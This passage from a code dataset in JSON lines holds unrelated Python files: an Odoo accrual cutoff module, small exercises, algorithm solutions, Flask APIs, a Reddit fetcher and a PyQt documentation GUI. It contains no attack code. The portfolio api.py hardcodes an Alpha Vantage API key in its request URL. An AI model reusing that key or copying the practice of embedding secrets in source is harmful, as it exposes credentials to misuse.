order_line_name=order_line.name,\n ),\n \"product\": product,\n \"partner\": order.partner_id.commercial_partner_id,\n }\n if order_type == \"purchase\":\n invoice_type = \"in_invoice\"\n elif order_type == \"sale\":\n invoice_type = \"out_invoice\"\n for move in moves:\n # TODO: improve comparaison of date and datetime\n # for our friends far away from GMT\n if move.state == \"done\" and move.date.date() <= self.cutoff_date:\n move_qty = move.product_uom._compute_quantity(\n move.product_uom_qty, product_uom\n )\n oline_dict[order_line][\"precut_delivered_qty\"] += move_qty\n price_origin = False\n for iline in ilines:\n invoice = iline.move_id\n if (\n invoice.move_type == invoice_type\n and float_compare(iline.quantity, 0, precision_digits=qty_prec) > 0\n ):\n iline_qty_puom = iline.product_uom_id._compute_quantity(\n iline.quantity, product_uom\n )\n if invoice.date <= self.cutoff_date:\n oline_dict[order_line][\"precut_invoiced_qty\"] += iline_qty_puom\n # Most recent invoice line used for price_unit, account,...\n price_unit = iline.price_subtotal / iline_qty_puom\n price_origin = invoice.name\n currency = invoice.currency_id\n account_id = iline.account_id.id\n analytic_account_id = iline.analytic_account_id.id\n taxes = iline.tax_ids\n if not price_origin:\n if order_type == \"purchase\":\n oline_qty_puom = order_line.product_uom._compute_quantity(\n order_line.product_qty, product_uom\n )\n price_unit = order_line.price_subtotal / oline_qty_puom\n price_origin = order.name\n currency = order.currency_id\n analytic_account_id = order_line.account_analytic_id.id\n taxes = order_line.taxes_id\n account = product._get_product_accounts()[\"expense\"]\n if not account:\n raise UserError(\n _(\n \"Missing expense account on product \"\n \"'%(product_display_name)s' or on its \"\n \"related product category '%(product_categ_display_name)s'.\",\n product_display_name=product.display_name,\n product_categ_display_name=product.categ_id.display_name,\n )\n )\n account_id = order.fiscal_position_id.map_account(account).id\n elif order_type == \"sale\":\n oline_qty_puom = order_line.product_uom._compute_quantity(\n order_line.product_uom_qty, product_uom\n )\n price_unit = order_line.price_subtotal / oline_qty_puom\n price_origin = order.name\n currency = order.currency_id\n analytic_account_id = order.analytic_account_id.id\n taxes = order_line.tax_id\n account = product._get_product_accounts()[\"income\"]\n if not account:\n raise UserError(\n _(\n \"Missing income account on product \"\n \"'%(product_display_name)s' or on its \"\n \"related product category '%(product_categ_display_name)s'.\",\n product_display_name=product.display_name,\n product_categ_display_name=product.categ_id.display_name,\n )\n )\n account_id = order.fiscal_position_id.map_account(account).id\n\n oline_dict[order_line].update(\n {\n \"price_unit\": price_unit,\n \"price_origin\": price_origin,\n \"currency\": currency,\n \"analytic_account_id\": analytic_account_id,\n \"account_id\": account_id,\n \"taxes\": taxes,\n }\n )\n\n def stock_move_update_oline_dict(self, move_line, oline_dict):\n dpo = self.env[\"decimal.precision\"]\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n if self.cutoff_type == \"accrued_expense\":\n if (\n move_line.purchase_line_id\n and move_line.purchase_line_id not in oline_dict\n and not float_is_zero(\n move_line.purchase_line_id.product_qty, precision_digits=qty_prec\n )\n ):\n self.order_line_update_oline_dict(\n move_line.purchase_line_id, \"purchase\", oline_dict\n )\n elif self.cutoff_type == \"accrued_revenue\":\n if (\n move_line.sale_line_id\n and move_line.sale_line_id not in oline_dict\n and not float_is_zero(\n move_line.sale_line_id.product_uom_qty, precision_digits=qty_prec\n )\n ):\n self.order_line_update_oline_dict(\n move_line.sale_line_id, \"sale\", oline_dict\n )\n\n def get_lines(self):\n res = super().get_lines()\n spo = self.env[\"stock.picking\"]\n aclo = self.env[\"account.cutoff.line\"]\n\n pick_type_map = {\n \"accrued_revenue\": \"outgoing\",\n \"accrued_expense\": \"incoming\",\n }\n cutoff_type = self.cutoff_type\n if cutoff_type not in pick_type_map:\n return res\n\n # Create account mapping dict\n account_mapping = self._get_mapping_dict()\n\n min_date_dt = self.cutoff_date - relativedelta(days=self.picking_interval_days)\n\n # TODO date_done is a Datetime field, so maybe we need more clever code\n # for our friends which are far away from GMT\n pickings = spo.search(\n [\n (\"picking_type_code\", \"=\", pick_type_map[cutoff_type]),\n (\"state\", \"=\", \"done\"),\n (\"date_done\", \"<=\", self.cutoff_date),\n (\"date_done\", \">=\", min_date_dt),\n (\"company_id\", \"=\", self.company_id.id),\n ]\n )\n\n oline_dict = {} # order line dict\n # key = PO line or SO line recordset\n # value = {\n # 'precut_delivered_qty': 1.0,\n # 'precut_invoiced_qty': 0.0,\n # 'price_unit': 12.42,\n # }\n # -> we use precut_delivered_qty - precut_invoiced_qty\n for p in pickings:\n for move in p.move_lines.filtered(lambda m: m.state == \"done\"):\n self.stock_move_update_oline_dict(move, oline_dict)\n\n # from pprint import pprint\n # pprint(oline_dict)\n for vdict in oline_dict.values():\n vals = self.picking_prepare_cutoff_line(vdict, account_mapping)\n if vals:\n aclo.create(vals)\n return res\n","repo_name":"camptocamp/smartcamp_core","sub_path":"account_cutoff_accrual_picking/models/account_cutoff.py","file_name":"account_cutoff.py","file_ext":"py","file_size_in_byte":11196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71503851345","text":"import time\nimport requests\n\n\ndef read_example() -> None:\n res = requests.get('http://example.com')\n print(res.status_code)\n\n\nsync_start = time.time()\n\nread_example()\nread_example()\n\nsync_end = time.time()\n\nprint(f'Sync running took {sync_end-sync_start:0.4f} seconds')\n","repo_name":"OneHandedPirate/Books","sub_path":"Python Concurrency with asyncio/1 Getting to know asyncio/1.7_37_sync_status_code_reading.py","file_name":"1.7_37_sync_status_code_reading.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16676454497","text":"#reduce() - reduces whole list or dictionary to a single value\n#each element is processed one by one using some lambda function\nfrom functools import reduce\nnum = [5, 7, 12, 4, 1]\ntotalSum = reduce(lambda x,y : x+y, num)\nprint(totalSum) #29\n\n#using reduce to get maximum element from list\nnum = [5, 7, 12, 4, 1, 99, 68]\nmaxElement = reduce(lambda x,y : x if x>y else y, num)\nprint(maxElement) #99\n\nname = ['ferrari', 'bmw', 'lamborgini', 'tesla', 'audi', 'porsche', 'volkswag']\nlongestName = reduce(lambda x,y : x if len(x)>=len(y) else y, name)\nprint(longestName) #lamborgini\n","repo_name":"vrrohan/Python100DaysOfCode","sub_path":"Day12-LambdaFunctions/Py4-LambdaReduce.py","file_name":"Py4-LambdaReduce.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001083138","text":"import sys\nsys.stdin = open(\"D4_5122_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N, M, L = map(int, input().split())\n data = list(map(int, input().split()))\n for _ in range(M):\n cal = list(map(str, input().split()))\n if cal[0] == 'I':\n data.insert(int(cal[1]), int(cal[2]))\n elif cal[0] == 'D':\n data.pop(int(cal[1]))\n else:\n data[int(cal[1])] = int(cal[2])\n if len(data) - 1 >= L:\n print(\"#{} {}\".format(test_case + 1, data[L]))\n else:\n print(\"#{} {}\".format(test_case + 1, -1))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D4_5122.py","file_name":"D4_5122.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72632120466","text":"points = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137, \"(\":1, \"[\":2, \"{\":3, \"<\":4}\r\nmatch = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\", \">\": \"<\"}\r\ntotal = 0\r\ntotals_p2 = []\r\n\r\nwith open(\"tag10.txt\") as f:\r\n for line in f:\r\n stack = []\r\n corrupt = False\r\n line = line.strip()\r\n for c in line:\r\n if c in [\"(\", \"[\", \"{\", \"<\"]:\r\n stack.append(c)\r\n else:\r\n if stack[-1] == match[c]:\r\n stack.pop()\r\n else:\r\n total += points[c]\r\n corrupt = True\r\n break\r\n \r\n #part 2\r\n p2 = 0\r\n if not corrupt and len(stack) > 0:\r\n for i in reversed(stack):\r\n p2 = p2 * 5 + points[i]\r\n totals_p2.append(p2)\r\n\r\n\r\nprint(total)\r\ntotals_p2.sort()\r\nprint(totals_p2[int(len(totals_p2)*0.5)])","repo_name":"AwesomeAxolotl/Advent_of_Code_2021","sub_path":"tag10.py","file_name":"tag10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20676258456","text":"import numpy as np\r\nimport sqlalchemy\r\nfrom sqlalchemy.ext.automap import automap_base\r\nfrom sqlalchemy.orm import Session\r\nfrom sqlalchemy import create_engine, func, inspect\r\nfrom flask import Flask, jsonify\r\nimport datetime as datetime\r\n\r\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\r\nBase = automap_base()\r\nBase.prepare(engine, reflect=True)\r\nMeasurement = Base.classes.measurement\r\nStation = Base.classes.station\r\nsession = Session(engine)\r\n\r\napp = Flask(__name__)\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef homepage():\r\n\r\n return (\r\n f\"Avalable Routes:
\"\r\n f\"/api/v1.0/precipitation\"\r\n f\"- Dates and temperature observations from the last year
\"\r\n\r\n f\"/api/v1.0/stations\"\r\n f\"- List of stations
\"\r\n\r\n f\"/api/v1.0/tobs\"\r\n f\"- Temperature Observations from the past year
\"\r\n\r\n f\"/api/v1.0/\"\r\n f\"- Minimum temperature, the average temperature, and the max temperature for a given start day
\"\r\n\r\n f\"/api/v1.0//\"\r\n f\"- Minimum temperature, the average temperature, and the max temperature for a given start-end range
\"\r\n )\r\n\r\n@app.route(\"/api/v1.0/precipitation\")\r\ndef pcrp():\r\n today = datetime.datetime.today()\r\n today = today.date()\r\n last_year = today - datetime.timedelta(365)\r\n pcp_year = list(session.query(Measurement.date, Measurement.prcp).filter((Measurement.date <= today, Measurement.date >= last_year)).all())\r\n return jsonify(pcp_year)\r\n\r\n@app.route(\"/api/v1.0/stations\")\r\ndef station_list():\r\n st_list = session.query(Station.station).all()\r\n all_stations= list(np.ravel(st_list))\r\n return jsonify(all_stations)\r\n\r\n@app.route(\"/api/v1.0/tobs\")\r\ndef temp_year():\r\n today = datetime.datetime.today()\r\n today = today.date()\r\n last_year = today - datetime.timedelta(365)\r\n temp_year = session.query(Measurement.date, Measurement.tobs).filter((Measurement.date <= today, Measurement.date >= last_year)).all()\r\n return jsonify(temp_year)\r\n\r\n@app.route(\"/api/v1.0/\")\r\ndef start_temp(start):\r\n temp_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\r\n return jsonify(temp_data)\r\n\r\n \r\n\r\n@app.route(\"/api/v1.0//\")\r\ndef range_temp(start, end):\r\n temp_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter((Measurement.date >= start, Measurement.date <= end)).all()\r\n \r\n return jsonify(temp_data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n# import datetime as datetime\r\n# import numpy as np\r\n# import pandas as pd\r\n\r\n# import sqlalchemy\r\n# from sqlalchemy.ext.automap import automap_base\r\n# from sqlalchemy.orm import Session\r\n# from sqlalchemy import create_engine, func\r\n\r\n# from flask import Flask, jsonify\r\n\r\n\r\n# def get_session_tables():\r\n# engine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\r\n# Base = automap_base()\r\n# Base.prepare(engine, reflect=True)\r\n# Measurement = Base.classes.measurement\r\n# Station = Base.classes.station\r\n# session = Session(engine)\r\n# return (session, Measurement, Station)\r\n\r\n# app = Flask(__name__)\r\n\r\n# @app.route(\"/\")\r\n# def homepage():\r\n# # thread gets created to service the request\r\n# \"\"\"List of all returnable API routes.\"\"\"\r\n# return(\r\n# f\"(Note: Dates range from 2010-01-01 to 2017-08-23).

\"\r\n# f\"Available Routes:
\"\r\n\r\n# f\"/api/v1.0/precipitation
\"\r\n# f\"Returns dates and temperature from the last year.

\"\r\n\r\n# f\"/api/v1.0/stations
\"\r\n# f\"Returns a json list of stations.

\"\r\n\r\n# f\"/api/v1.0/tobs
\"\r\n# f\"Returns list of Temperature Observations(tobs) for previous year.

\"\r\n\r\n# f\"/api/v1.0/yyyy-mm-dd/
\"\r\n# f\"Returns an Average, Max, and Min temperatures for a given start date.

\"\r\n\r\n# f\"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/
\"\r\n# f\"Returns an Average, Max, and Min temperatures for a given date range.\"\r\n\r\n \r\n# )\r\n\r\n# # Note - here we are getting the db variables\r\n# # within the same thread that's servicing the request\r\n# # So we don't throw some programming error on Windows machines\r\n# @app.route(\"/api/v1.0/precipitation\")\r\n# def precipitation():\r\n# # connection to the db, session, tables\r\n# session, Measurement, Station = get_session_tables()\r\n# \"\"\"Return Dates and Temp from the last year.\"\"\"\r\n# precip_analysis = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= \"2016-08-23\").\\\r\n# filter(Measurement.date <= \"2017-08-23\").all()\r\n\r\n# # creates JSONified list\r\n# precipitation_list = [precip_analysis]\r\n\r\n# return jsonify(precipitation_list)\r\n\r\n# if __name__ == '__main__':\r\n# app.run(debug=True)","repo_name":"damianmc88/SQLAlchemy_Climate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7036930811","text":"#!/usr/bin/python3\n\"\"\"Write a function that queries the Reddit API and prints the titles\nof the first 10 hot posts listed for a given subreddit.\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"Print first 10 hot posts listed for a given subreddit\"\"\"\n url = \"https://www.reddit.com/r/{}/hot/.json\".format(subreddit)\n headers = {\n \"User-Agent\": \"cyrusDev@alx-holbertonschool\"\n }\n params = {\n \"limit\": 10\n }\n response = requests.get(url, headers=headers, params=params,\n allow_redirects=False)\n if response.status_code == 404:\n print(\"None\")\n return\n posts = response.json().get(\"data\").get(\"children\")\n for post in posts:\n print(post.get(\"data\").get(\"title\"))\n","repo_name":"cyrusDev1/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13598491937","text":"#!/usr/bin/python3\n# MDDocGUI\nimport sys\nimport os\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget, QCheckBox, QApplication, QMainWindow, QFileDialog, QTableView, QMessageBox\nfrom PyQt5.uic import loadUi\nimport time\nimport string\nfrom MDDoc import MDDoc\nfrom subprocess import call\nimport http.server\nimport socketserver\n# Load paremeters\n#import Param\n#Param.param.init('H:/cloud/cloud_data/Projects/REFT/Software/GUIApp/REFTCode/init/init.xml')\n#Param.param.read()\n#Param.param.printParams()\n\nfileDirMDDoc = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(fileDirMDDoc + '\\\\init')\nimport Param\n\nimport threading\nfrom shutil import copyfile, rmtree\nfrom YAML import YAML\n#param = Param('H:/cloud/cloud_data/Projects/MDDoc/init/init.xml')\n#param.read()\n\n\n \nclass MDDocGUI(QMainWindow):\n \n # Events\n keyPressed = QtCore.pyqtSignal(QtCore.QEvent)\n drawing = None\n orders = None\n params = None\n current_order = None\n milling = None\n doc = MDDoc()\n httpd = None\n doc_exist = False\n doc_open = False\n thread_server = None\n yaml = YAML()\n paramsRestart = dict() \n ui = None\n \n def __init__(self):\n # Init GUI \n print('test')\n Param.param.read()\n Param.param.printParams()\n self.params=Param.param.params;\n \n \n print('UIPath: ', self.params['UIPath'])\n UIPath = self.params['UIPath']\n super(MDDocGUI,self).__init__()\n \n self.ui = loadUi(UIPath, self)\n self.setWindowTitle('MDDoc')\n \n # Init parameter\n self.paramsRestart = self.yaml.load(self.params['ParamsRestartPath'])\n self.SourceFolder.setText(self.paramsRestart['SourceFolder'])\n self.DestinationFolder.setText(self.paramsRestart['DestinationFolder'])\n \n # Set callback functions\n self.CreateDocButton.clicked.connect(self.on_CreateDocButton)\n self.StatusLine.append(\"Initialization started\")\n self.SourceButton.clicked.connect(self.on_SourceButton)\n self.DestinationButton.clicked.connect(self.on_DestinationButtonButton)\n \n self.OpenDocButton.clicked.connect(self.on_OpenDocButton)\n self.CloseDocButton.clicked.connect(self.on_CloseDocButton)\n \n \n self.SourceFolder.textChanged.connect(self.on_textChanged_SourceFolder)\n self.DestinationFolder.textChanged.connect(self.on_textChanged_DestinationFolder)\n \n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n self.doc_exist = os.path.isfile(DestinationFolder + '/index.html')\n \n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n \n self.OpenDocButton.setEnabled(self.doc_exist)\n self.CloseDocButton.setEnabled(self.doc_open)\n \n #self.ui.btnExit.clicked.connect(self.close)\n #self.ui.actionExit.triggered.connect(self.close)\n \n #self.milling = Milling.Milling('milling', self.params['DatabaseSQLitePath'])\n #reload(DrawingClass)\n \n # Drawing tab\n #self.LoadOrdersButton.clicked.connect(self.on_LoadOrdersButton)\n #self.CreateDrawingButton.clicked.connect(self.on_CreateDrawingButton)\n #self.OrdersTable.clicked.connect(self.on_clicked_OrdersTable) \n #self.StatusLine.append(\"Initialization started\")\n \n # Milling tab\n #self.LoadOrdersMillingButton.clicked.connect(self.on_LoadOrdersButton)\n #self.CreateMillingButton.clicked.connect(self.on_clicked_CreateMillingButton)\n #self.OrdersMillingTable.clicked.connect(self.on_clicked_OrdersMillingTable) \n \n def closeEvent(self, event):\n print(\"event\")\n reply = QtWidgets.QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)\n\n if reply == QtWidgets.QMessageBox.Yes: \n self.paramsRestart['SourceFolder'] = self.SourceFolder.text()\n self.paramsRestart['DestinationFolder'] = self.DestinationFolder.text()\n self.yaml.save(self.paramsRestart, self.params['ParamsRestartPath'])\n event.accept()\n else:\n event.ignore()\n \n def serverfunc(self, DestinationFolder):\n os.chdir(DestinationFolder) \n PORT = 8000\n Handler = http.server.SimpleHTTPRequestHandler \n with socketserver.TCPServer((\"\", PORT), Handler) as self.httpd:\n self.httpd.serve_forever()\n self.StatusLine.append('Closing server')\n \n @pyqtSlot()\n def on_textChanged_SourceFolder(self):\n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n else:\n self.CreateDocButton.setEnabled(True)\n \n @pyqtSlot()\n def on_textChanged_DestinationFolder(self):\n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n else:\n self.CreateDocButton.setEnabled(True)\n self.doc_exist = os.path.isfile(DestinationFolder + '/index.html')\n self.OpenDocButton.setEnabled(self.doc_exist)\n\n \n @pyqtSlot()\n def on_CloseDocButton(self):\n print('on_CloseDocButton')\n self.httpd.shutdown()\n self.thread_server.join()\n #self.thread_server._stop()\n DestinationFolder = self.DestinationFolder.text()\n self.doc_exist = os.path.isfile(DestinationFolder + '/index.html')\n self.OpenDocButton.setEnabled(self.doc_exist)\n self.doc_open = False\n self.CloseDocButton.setEnabled(self.doc_open)\n \n @pyqtSlot()\n def on_OpenDocButton(self): \n DestinationFolder = self.DestinationFolder.text()\n if os.path.isdir(DestinationFolder):\n call([\"C:/Program Files/Mozilla Firefox/firefox.exe\", \"-new-window\", \"http://127.0.0.1:8000/\"]) \n self.thread_server = threading.Thread(target=self.serverfunc,args=[self.DestinationFolder.text()])\n self.thread_server.start()\n self.StatusLine.append('Opening server')\n self.doc_open = True\n self.CloseDocButton.setEnabled(self.doc_open)\n self.OpenDocButton.setEnabled(not self.doc_open)\n else:\n self.StatusLine.append('Destination folder not found!')\n self.doc_open = False\n self.CloseDocButton.setEnabled(self.doc_open)\n\n @pyqtSlot()\n def on_SourceButton(self): \n self.SourceFolder.setText(str(QFileDialog.getExistingDirectory(self, \"Select source folder\")))\n \n @pyqtSlot()\n def on_DestinationButtonButton(self): \n self.DestinationFolder.setText(str(QFileDialog.getExistingDirectory(self, \"Select destination folder\")))\n \n @pyqtSlot()\n def on_CreateDocButton(self): \n if self.CopyCheckBox.isChecked():\n # Deep copy\n sourceFolder = self.SourceFolder.text()\n destinationFolder = self.DestinationFolder.text()\n if not sourceFolder:\n self.StatusLine.append(\"Source folder is not defined!\")\n return\n if not destinationFolder:\n self.StatusLine.append(\"Target folder is not defined!\")\n return\n YMlFilepath = self.params['YMLPath']\n created = self.doc.createMKDocs(sourceFolder, destinationFolder, YMlFilepath)\n else:\n # Extract markdown files and copy in tmp folder\n sourceFolder = self.SourceFolder.text()\n destinationFolder = self.DestinationFolder.text() \n if not sourceFolder:\n self.StatusLine.append(\"Source folder is not defined!\")\n return\n if not destinationFolder:\n self.StatusLine.append(\"Target folder is not defined!\")\n return\n \n num=len(sourceFolder)\n for root, directories, filenames in os.walk(sourceFolder):\n files = [ file for file in filenames if file.endswith( ('.md') ) ]\n for filename in files: \n filepath = os.path.join(root,filename) \n src = filepath\n tmp_path = os.path.dirname(sourceFolder) + \"/tmp\"\n dst = tmp_path + src[num:] \n os.makedirs(os.path.dirname(dst), exist_ok=True)\n copyfile(src, dst)\n \n # Shellow copy\n dir_path = os.path.dirname(os.path.realpath(__file__))\n sourceFolder = dir_path + \"\\\\tmp\"\n destinationFolder = self.DestinationFolder.text()\n YMlFilepath = self.params['YMLPath']\n created = self.doc.createMKDocs(tmp_path, destinationFolder, YMlFilepath) \n \n # Delete tmp folder\n if os.path.exists(tmp_path) and os.path.isdir(tmp_path):\n rmtree(tmp_path)\n if created:\n self.StatusLine.append(\"Documentation creation succeeded.\")\n self.doc_exist = True\n self.OpenDocButton.setEnabled(True)\n else:\n self.StatusLine.append(\"Documentation creation failed.\")\n self.doc_exist = False\n self.OpenDocButton.setEnabled(False)\n \n #@pyqtSlot()\n def on_clicked_OrdersMillingTable(self, signal):\n row = signal.row()\n parameter = self.orders[row][2]\n self.updateParameter(parameter)\n self.current_order = self.orders[row]\n \n #@pyqtSlot()\n def on_clicked_OrdersTable(self, signal):\n row = signal.row()\n parameter = self.orders[row][2]\n self.updateParameter(parameter)\n self.current_order = self.orders[row]\n \n @pyqtSlot()\n def on_LoadOrdersButton(self):\n \n print('on_LoadOrdersButton')\n # Init OrdersTable\n self.orders = self.drawing.database.getOrders()\n self.OrdersTable.setSelectionBehavior(QTableView.SelectRows);\n self.OrdersMillingTable.setSelectionBehavior(QTableView.SelectRows);\n self.model = QtGui.QStandardItemModel(parent=self)\n self.model.takeRow\n header = ['OrderID', 'FurnitureID', 'Paremter']\n self.model.setHorizontalHeaderLabels(header)\n \n # Set orders data\n row = 0\n for o in self.orders:\n for column in range(len(header)):\n item = QtGui.QStandardItem()\n item.setText(str(o[column]))\n self.model.setItem(row, column, item)\n row = row + 1\n self.OrdersTable.setModel(self.model)\n self.OrdersMillingTable.setModel(self.model)\n \n @pyqtSlot()\n def on_CreateDrawingButton(self): \n # Start FreeCAD and open furniture\n furnitureID = self.current_order[0]\n column = 'name'\n furnitureName = self.drawing.database.getFurniture(furnitureID, column)[0][0]\n furnituresPath = self.drawing.database.getParameter('furnituresPath')[0]\n furnitureFilePath = furnituresPath + '/' + furnitureName + '/' + furnitureName + '.FCStd'\n freecadPath = self.params['FreeCADPath']\n self.drawing.startFreecad(furnitureFilePath, freecadPath)\n \n def updateParameter(self, parameter):\n \n # Split milling part names\n self.Parameters.setText('')\n params = parameter.split(\",\")\n for txt in params:\n txt=txt.replace(\" \", \"\")\n self.Parameters.append(txt)\n \ndef isfloat(x):\n try:\n float(x)\n except ValueError:\n return False\n else:\n return True\n\ndef isint(x):\n try:\n int(x)\n except ValueError:\n return False\n else:\n return True\n\ndef startGUI():\n # Start GUI\n app = QApplication(sys.argv)\n widget = MDDocGUI()\n widget.show();\n app.aboutToQuit.connect(app.deleteLater)\n sys.exit(app.exec_())\n \ndef main():\n\n # Start GUI\n startGUI()\n \nif __name__ == '__main__':\n main()","repo_name":"Berni1557/MDDoc","sub_path":"MDDocGUI.py","file_name":"MDDocGUI.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26219942262","text":"\"\"\"\napi.py\n- provides the API endpoints for consuming and producing\n REST requests and responses\n\"\"\"\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom datetime import datetime, timedelta\n\nimport json\nimport requests\n\n# Free API limits - 5 requests per minute and 500 per day\nAV_API_URL = \"https://www.alphavantage.co/query?apikey=9G4G4R3GA5E5ENSZ&\"\n\n# Data store init state\nstore = {\n 'cash_value': 0,\n 'portfolio': {\n 'VFINX': {\n # 'name': 'Vanguard 500 Index Fund Investor Shares',\n 'quantity': 0,\n 'price': None,\n },\n 'NAESX': {\n # 'name': 'Vanguard Small Capitalization Index Fund Investor Shares',\n 'quantity': 0,\n 'price': None,\n },\n 'VGTSX': {\n # 'name': 'Vanguard Total International Stock Index Fund Investor Shares',\n 'quantity': 0,\n 'price': None,\n },\n 'VBMFX': {\n # 'name': 'Vanguard Total Bond Market Index Fund Investor Shares',\n 'quantity': 0,\n 'price': None,\n }\n },\n 'last_updated': { # when was the price last updated from Alpha Vantage\n 'VFINX': None,\n 'NAESX': None,\n 'VGTSX': None,\n 'VBMFX': None,\n },\n}\n\n\nclass Cash(Resource):\n def get(self):\n # Default to 200 OK\n return {'cashValue': store['cash_value']}\n\n def post(self):\n data = request.get_json()\n transfer_amount = float(data['transferAmount'])\n\n if store['cash_value'] + transfer_amount < 0:\n return {}, 403 # Forbidden\n else:\n store['cash_value'] += transfer_amount\n return {}, 200\n\n\nclass Portfolio(Resource):\n def get(self):\n status_code = 200\n for symbol in store['portfolio']:\n stock = store['portfolio'][symbol]\n # Only update from Alpha Vantage for first time or max once every 5 minutes\n if store['last_updated'][symbol] == None or datetime.now() - store['last_updated'][symbol] > timedelta(seconds=5*60):\n response = requests.get(\n AV_API_URL + 'function=GLOBAL_QUOTE&symbol=' + symbol)\n try:\n # This works because stock is just a pointer\n stock['price'] = float(\n response.json()[\"Global Quote\"][\"05. price\"])\n store['last_updated'][symbol] = datetime.now()\n except:\n status_code = 429 # Too Many Requests\n\n return {'portfolio': store['portfolio']}, status_code\n\n\nclass Stock(Resource):\n def post(self, symbol):\n stock = store['portfolio'][symbol]\n data = request.get_json()\n transfer_amount = int(data['transferAmount'])\n\n if stock['quantity'] + transfer_amount < 0:\n return {}, 403 # Forbidden\n elif transfer_amount * stock['price'] > store['cash_value']:\n # Make sure they have enough money\n return {}, 403\n else:\n stock['quantity'] += transfer_amount\n store['cash_value'] -= transfer_amount * stock['price']\n return {}, 200\n","repo_name":"viv-li/bonsai","sub_path":"backend/bonsaiapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20689504016","text":"def solution1(a, b, k):\n count_tiny = 0\n concat_numbers = []\n for i, j in zip(a, reversed(b)):\n temp_j = j\n count_digits = 0\n while temp_j != 0:\n temp_j = temp_j // 10\n count_digits += 1\n concat_number = i * count_digits + j\n concat_numbers.append(concat_number)\n for num in concat_numbers:\n if num < k:\n count_tiny += 1\n return count_tiny\nprint(solution1([1,2,3], [1,2,3], 31))\n\ndef solution(a, k):\n list_of_sums = []\n count = 0\n for i in range(len(a) - 1):\n for j in range(i+1, len(a)):\n list_of_sums.append(a[i] + a[j])\n for num in list_of_sums:\n if num % k == 0:\n count += 1\n return count\n\ndef solution2(a, k):\n nums = [a[i] + a[j] for i in range(len(a) - 1) for j in range(i+1, len(a)) if (a[i] + a[j]) % k == 0]\n print(nums)\n return len(nums)\nprint(solution2([1, 2, 3, 4, 5], 3))\n\ndef solution(a, k):\n if k == 0:\n return 0\n else:\n return len([a[i] + a[j] for i in range(len(a) - 1) for j in range(i+1, len(a)) \\\n if (a[i] + a[j]) % k == 0])","repo_name":"nadia-paz/ds-learning","sub_path":"python/data_structures/exercises2.py","file_name":"exercises2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13235107821","text":"# classwork\ndef doNow(s):\n if len(s) >= 3:\n if s[-3:] == \"ing\":\n return s + \"ly\"\n else:\n return s + \"ing\"\n else:\n return s\n\ndef oddIndex(s):\n return s[::2]\n\n\ndef count(s):\n searched = \"\"\n for i in range(0, len(s)):\n if searched.count(s[i]) == 0:\n searched += s[i]\n if s.count(s[i]) > 1:\n print(s[i], s.count(s[i]))\n\n# homework\ndef index(s, c):\n for i in range(len(s)):\n if(s[i] == c):\n print(\"Current character\", s[i], \"position at\", i)\n\n\n# challenge\ndef replace(s):\n n = s.find(\"not\")\n p = s.find(\"poor\")\n if n == -1 or p == -1:\n return s\n\n n += 3\n\n return s[:p] + \"good\" + s[n:]\n\ndef caesar(s, shift):\n ans = \"\"\n for i in range(0, len(s)):\n if 97 <= ord(s[i]) <= 122:\n ans += chr((((ord(s[i]) - 97) - shift) % 26) + 97)\n elif 